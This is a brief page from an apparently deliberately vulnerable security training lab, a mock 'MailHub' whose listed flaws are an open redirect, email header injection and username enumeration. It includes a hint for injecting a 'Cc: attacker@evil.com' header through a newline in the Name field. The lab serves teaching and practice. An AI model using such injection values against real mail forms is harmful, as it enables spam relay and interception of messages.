✉️ MailHub

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab — Open redirect in login, email header injection in contact, username enumeration in reset.

Contact Support

Hint: put a newline followed by "Cc: attacker@evil.com" in the Name field to inject an email header.